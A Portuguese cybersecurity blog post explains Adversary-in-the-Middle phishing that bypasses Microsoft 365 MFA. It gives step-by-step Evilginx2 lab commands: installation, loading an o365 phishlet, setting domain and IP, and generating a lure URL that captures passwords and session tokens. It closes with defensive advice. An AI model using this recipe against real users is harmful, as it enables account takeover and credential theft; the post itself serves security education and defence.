Bypass Azure MFA

Sim, até a autenticação multi fator (MFA) pode ser burlada usando uma boa engenharia social e as ferramentas adequadas.. Descubra como o ataque Adversário no Meio (AiTM) funciona e por que sua organização precisa estar atenta a esse risco.

Neste artigo eu vou demonstrar como isso pode acontecer e o que você deve fazer para evitar esse tipo de ataque.

O Adversary-in-the-Middle (AiTM), ou Adversário no Meio, é uma técnica onde o atacante se posiciona entre o usuário e o site legítimo (como o portal da Microsoft 365), interceptando toda a comunicação.

NOTA: Adversary-in-the-Middle (AiTM) é uma variação moderna e mais específica do tradicional Man-in-the-Middle (MitM).

Diferente de ataques de phishing simples, que tentam capturar apenas login e senha, o AiTM também rouba o token de sessão após a autenticação de dois fatores. Com isso, o invasor pode assumir a sessão do usuário sem precisar da senha ou do código do MFA novamente.

Proxy reverso

 O proxy intercepta a página de login, captura a senha, a encaminha para o site real, permite que o desafio MFA prossiga e, em seguida, captura o token de sessão resultante para reutilização posterior 

Ferramentas usadas em laboratórios de AiTM

Se você quiser estudar esse tipo de ataque em um ambiente controlado (para fins educativos), algumas ferramentas comuns são:

  • Evilginx2 – Framework para proxy reverso e captura de sessão
  • Domínio personalizado com SSL – Como login.seu-dominio.xyz com Let’s Encrypt
  • Servidor em nuvem (Azure, DigitalOcean) – Para hospedar sua infraestrutura falsa

Em meu LAB eu registrei esse dominio :mvpconfsecurity.xyz 

Instalação do EVILGINX

sudo apt update && sudo apt upgrade -y
sudo apt install golang-go 
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make

Carregar phishlet do Microsoft 365

git clone https://github.com/webdevvx/evilginx-phishlets.git

Copie o phishilets do evilginx-phishlets para o diretório do evilginx/phishlets

Configuração do Phishlets

Carregue o EvilGins com o comando:

sudo ./evilginx -p /evilginx2/phishlets/
config domain SeuDominioRegistrado.com
phishlets hostname o365 SeuDominioRegistrado.com
config ipv4 SeuIPPublico
config ipv4 70.235.230.150

Criar o lure

Lure é o termo usado no Evilginx2 para descrever um link de phishing personalizado que leva o alvo a uma página controlada pelo atacante, baseada em um phishlet (modelo de site clonado).

lures create o365
lures get-url 0

Esse é o link de phishing controlado. Copie a URL e faça o email ou teste através do Browser.

Abra o link gerado e veja se a página do Microsoft 365 é exibida.

O Evilginx interceptará:

  • E-mail
  • Senha
  • Token de sessão
  • Possibilidade de acesso direto à conta sem precisar do 2FA

Ajustar manualmente (opcional)

Você pode ajustar parâmetros como tempo de expiração de sessão, logs, etc.

sudo nano /root/.evilginx/config.json

Como se proteger

  • Use FIDO2/YubiKeys
  • Habilite detecção de anomalias (Azure AD, Microsoft Defender)
  • Não clique em links de login recebidos por e-mail
  • Revogue sessões e tokens ativos em caso de suspeita

Anúncio

Sobre Daniel Donda 584 Artigos
Olá, meu nome é Daniel Donda e sou especialista em cibersegurança, autor de livros, professor e palestrante. Saiba mais

Seja o primeiro a comentar

Faça um comentário

Seu e-mail não será divulgado.


*